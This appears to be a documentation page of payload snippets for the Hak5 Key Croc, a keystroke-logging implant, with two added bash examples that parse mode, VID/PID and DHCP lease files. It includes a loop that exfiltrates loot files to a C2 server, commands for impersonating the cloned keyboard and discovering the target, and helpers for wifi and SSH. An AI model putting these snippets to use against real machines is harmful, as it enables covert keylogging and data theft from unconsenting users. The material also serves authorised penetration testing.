Helpful Payload Snippets

The C2EXFIL tool, used to exfiltrate files to the configured Cloud C2 server, normally only handles one file at a time. Using a for loop, one may iterate over multiple files in a directory. Quoting "$f" keeps file names containing spaces intact, and the existence check skips the unexpanded pattern that the shell leaves behind when no .txt files match:

for f in "$LOOT_DIR"/*.txt; do
    [ -e "$f" ] || continue   # no match: the glob is left as a literal pattern
    C2EXFIL STRING "$f" Example
done
By default the Key Croc boots into Attack Mode and clones the VID and PID values of the connected human interface device (HID keyboard). The VID and PID values are stored in the /tmp/vidpid file, separated by a colon, and may be referenced in a payload using the following:

# Set ATTACKMODE to HID and Ethernet with the cloned keyboard VID/PID
VENDOR=$(cut -d: -f1 /tmp/vidpid)
PRODUCT=$(cut -d: -f2 /tmp/vidpid)
ATTACKMODE HID ECM_ETHERNET VID_0X$VENDOR PID_0X$PRODUCT
If the Key Croc is in Attack Mode, rather than Arming Mode, the /tmp/attackmode file will exist.

Checking the current ATTACKMODE
The Key Croc stores its current ATTACKMODE in the file /tmp/mode. In addition to the ATTACKMODE options such as HID or SERIAL, the /tmp/mode file records any additional parameters, such as VID and PID. These values may be passed to a new ATTACKMODE command using bash command substitution. In this example, the output of "cat /tmp/mode" inside the $() construct is substituted into the command line; the substitution is deliberately left unquoted so that each word in the file becomes a separate ATTACKMODE argument:

root@croc:~# cat /tmp/mode
HID VID_0X04B3 PID_0X3025
root@croc:~# ATTACKMODE ECM_ETHERNET $(cat /tmp/mode)
TARGET_IP = 172.16.64.10, TARGET_HOSTNAME = kali, HOST_IP = 172.16.64.1
root@croc:~#
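The following is an added example, not code from Hak5 or the Key Croc firmware. It covers both the /tmp/vidpid snippet above and the /tmp/mode session: it turns the contents of those files into an ATTACKMODE argument list, checks that each VID and PID value is exactly four hex digits before it reaches ATTACKMODE, and appends an option such as ECM_ETHERNET only if it is not already present in the mode line. The page does not say whether ATTACKMODE tolerates a repeated option, so the merge is a precaution. The mode line and file paths are passed as arguments, and the sample mode line and "vvvv:pppp" vidpid content are constructed here, so the functions can be exercised off the device.

```shell
#!/bin/bash
# Added example, not part of the Hak5 Key Croc firmware or documentation.
# Turns the current mode line (the content of /tmp/mode) and the cloned
# VID/PID file (/tmp/vidpid, assumed to hold "vvvv:pppp") into a checked
# ATTACKMODE argument list. Inputs are passed in so this runs off the device.

# is_hex4 VALUE -> 0 if VALUE is exactly four hex digits
is_hex4() {
    case $1 in
        [0-9A-Fa-f][0-9A-Fa-f][0-9A-Fa-f][0-9A-Fa-f]) return 0 ;;
        *) return 1 ;;
    esac
}

# upper STRING -> STRING in upper case (tr keeps this portable to plain sh)
upper() {
    printf '%s\n' "$1" | tr a-z A-Z
}

# mode_field MODE_LINE KEY -> prints the hex value of the KEY_0X.... token
# (mode_field "HID VID_0X04B3 PID_0X3025" VID -> 04B3); 1 if absent, 2 if not hex
mode_field() {
    local tok
    for tok in $1; do
        case $tok in
            "$2"_0[Xx]*)
                tok=${tok#"$2"_0[Xx]}
                is_hex4 "$tok" || return 2
                upper "$tok"
                return 0 ;;
        esac
    done
    return 1
}

# vidpid_args VIDPIDFILE -> prints "VID_0Xvvvv PID_0Xpppp" for a file holding
# "vvvv:pppp"; fails if either half is not four hex digits
vidpid_args() {
    local v p
    IFS=: read -r v p < "$1" || [ -n "$v" ] || return 1
    is_hex4 "$v" && is_hex4 "$p" || return 2
    printf 'VID_0X%s PID_0X%s\n' "$(upper "$v")" "$(upper "$p")"
}

# merge_mode MODE_LINE OPTION... -> MODE_LINE with each OPTION appended once,
# so an option already in the line (e.g. ECM_ETHERNET after a previous call)
# is not passed to ATTACKMODE twice
merge_mode() {
    local line=$1 opt tok found
    shift
    for opt in "$@"; do
        found=0
        for tok in $line; do
            if [ "$tok" = "$opt" ]; then found=1; fi
        done
        if [ "$found" -eq 0 ]; then line="$line $opt"; fi
    done
    printf '%s\n' "$line"
}

# Constructed samples matching the session above (not read from a device)
SAMPLE_MODE="HID VID_0X04B3 PID_0X3025"
SAMPLE_VIDPID=$(mktemp)
printf '04b3:3025\n' > "$SAMPLE_VIDPID"

# On the device the calls would be:
#   ATTACKMODE $(merge_mode "$(cat /tmp/mode)" ECM_ETHERNET)
#   ATTACKMODE HID ECM_ETHERNET $(vidpid_args /tmp/vidpid)
# Here only the resulting argument lists are printed.
if vid=$(mode_field "$SAMPLE_MODE" VID) && pid=$(mode_field "$SAMPLE_MODE" PID); then
    echo "Cloned keyboard VID=$vid PID=$pid"
    echo "ATTACKMODE $(merge_mode "$SAMPLE_MODE" ECM_ETHERNET)"
fi
if args=$(vidpid_args "$SAMPLE_VIDPID"); then
    echo "ATTACKMODE HID ECM_ETHERNET $args"
fi
```

Rejecting a malformed VID or PID before calling ATTACKMODE matters because the value ends up in the USB descriptor the target enumerates; a garbled token is easier to diagnose in the payload log than as a device that fails to enumerate.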
While the ECM_ETHERNET and RNDIS_ETHERNET options for ATTACKMODE display the target IP address and hostname interactively, these values may also be used in a payload. To load them into variables, run GET_VARS:

GET_VARS
# This exports the following variables:
$TARGET_IP
$TARGET_HOSTNAME
$HOST_IP
Alternatively, these target values may be obtained from the DHCP server's leases file. Note that dhcpd appends a new block each time a lease is granted or renewed, so when the file holds leases for more than one client the first command returns more than one address, and the sort | uniq | tail -n1 in the second returns the alphabetically last hostname rather than the most recent one:

TARGET_IP=$(grep ^lease /var/lib/dhcp/dhcpd.leases | awk '{print $2}' | sort | uniq)
TARGET_HOSTNAME=$(grep hostname /var/lib/dhcp/dhcpd.leases | awk '{print $2}' | sort | uniq | tail -n1 | sed 's/^[ \t]*//; s/"//g; s/;//')

And the host IP (the IP address of the Key Croc itself) can be read from the usb0 interface configuration:

HOST_IP=$(grep address /etc/network/interfaces.d/usb0 | awk '{print $2}')

However, unless changed from its default, this value will be 172.16.64.1.
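The following added example (not Hak5 code) parses the leases file block by block instead of with grep and sort, so a file containing several leases yields the most recently written block in the active binding state (with the newest block of any state as a fallback) and the matching client-hostname, and it reads the usb0 address line in a way that also tolerates an address written with a /prefix. The leases and interface files are constructed samples passed by path, so the functions run off the device; on the Key Croc they would be called with /var/lib/dhcp/dhcpd.leases and /etc/network/interfaces.d/usb0.

```shell
#!/bin/bash
# Added example, not part of the Hak5 Key Croc firmware or documentation.
# Parses an ISC dhcpd leases file the way a payload needs it: the file is
# append-only, so the most recently written block for a client is the one
# to trust, and a stale block for an earlier target must not win.

# lease_target LEASEFILE -> prints "IP HOSTNAME" for the newest block whose
# binding state is active (falls back to the newest block of any state).
# Returns 1 when the file contains no lease blocks.
lease_target() {
    awk '
        /^lease / { ip = $2; host = ""; state = ""; next }
        /^[ \t]*client-hostname/ { host = $2; gsub(/[";]/, "", host); next }
        /^[ \t]*binding state/ { state = $3; sub(/;$/, "", state); next }
        /^}/ {
            if (ip != "") {
                last_ip = ip; last_host = host
                if (state == "active") { act_ip = ip; act_host = host }
                ip = ""
            }
        }
        END {
            if (act_ip != "")       print act_ip, act_host
            else if (last_ip != "") print last_ip, last_host
            else                    exit 1
        }' "$1"
}

# target_vars LEASEFILE -> sets TARGET_IP and TARGET_HOSTNAME (the same names
# GET_VARS exports) from lease_target output; returns 1 if there is no lease
target_vars() {
    local out
    out=$(lease_target "$1") || return 1
    TARGET_IP=${out%% *}
    TARGET_HOSTNAME=${out#* }
}

# host_ip IFACEFILE -> the value of the address line in an ifupdown interface
# file, with any /prefix suffix removed
host_ip() {
    awk '$1 == "address" { sub("/.*", "", $2); print $2; exit }' "$1"
}

# Constructed sample files (not captured from a real device): an expired
# lease for a previous target followed by the active lease for the current one
SAMPLE_LEASES=$(mktemp)
cat > "$SAMPLE_LEASES" <<'EOF'
lease 172.16.64.11 {
  starts 4 2020/05/07 09:00:00;
  ends 4 2020/05/07 09:10:00;
  binding state free;
  hardware ethernet 00:11:22:33:44:55;
  client-hostname "oldbox";
}
lease 172.16.64.10 {
  starts 4 2020/05/07 12:00:00;
  ends 4 2020/05/07 12:10:00;
  binding state active;
  next binding state free;
  hardware ethernet 66:77:88:99:aa:bb;
  client-hostname "kali";
}
EOF
SAMPLE_USB0=$(mktemp)
printf 'auto usb0\niface usb0 inet static\n  address 172.16.64.1\n  netmask 255.255.255.0\n' > "$SAMPLE_USB0"

if target_vars "$SAMPLE_LEASES"; then
    echo "TARGET_IP = $TARGET_IP, TARGET_HOSTNAME = $TARGET_HOSTNAME, HOST_IP = $(host_ip "$SAMPLE_USB0")"
fi
```

The "next binding state" line inside a block is deliberately not matched (the pattern requires "binding state" at the start of the line), since it describes the state the lease will move to, not the current one.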
From firmware 1.3 onward, many functions of the Key Croc are exposed by sourcing the croc_framework. The GET_HELPERS command lists them with a short description of each:

root@croc:~/loot# GET_HELPERS
Available helper functions provided by sourcing croc_framework
MOUNT_UDISK
Mounts udisk and handles syncing /root/loot/ and /root/udisk/loot
UNMOUNT_UDISK
Safely Unmounts udisk
UPDATE_LANGUAGES
Copy language files from udisk to the croc
ENABLE_INTERFACE
Enables wlan0
CLEAR_WIFI_CONFIG
Remove wpa_supplicant.conf to clear current wireless configuration
CONFIG_OPEN_WIFI
Generate a wpa_supplicant.conf for open wifi
Example: CONFIG_OPEN_WIFI 'attwifi'
CONFIG_PSK_WIFI
Generate a wpa_supplicant.conf for psk wifi
Example: CONFIG_PSK_WIFI 'attwifi' 'password'
START_WLAN_DHCP
Start dhcp on wlan0
ENABLE_WIFI
Enable wifi helper
configures wpa_supplicant, indicates using LED,
enables interface, starts wpa_supplicant and dhcp
Example psk: ENABLE_WIFI 'attwifi' 'password'
Example open: ENABLE_WIFI 'attwifi'
DISABLE_SSH
Disable SSH service
ENABLE_SSH
Enable SSH service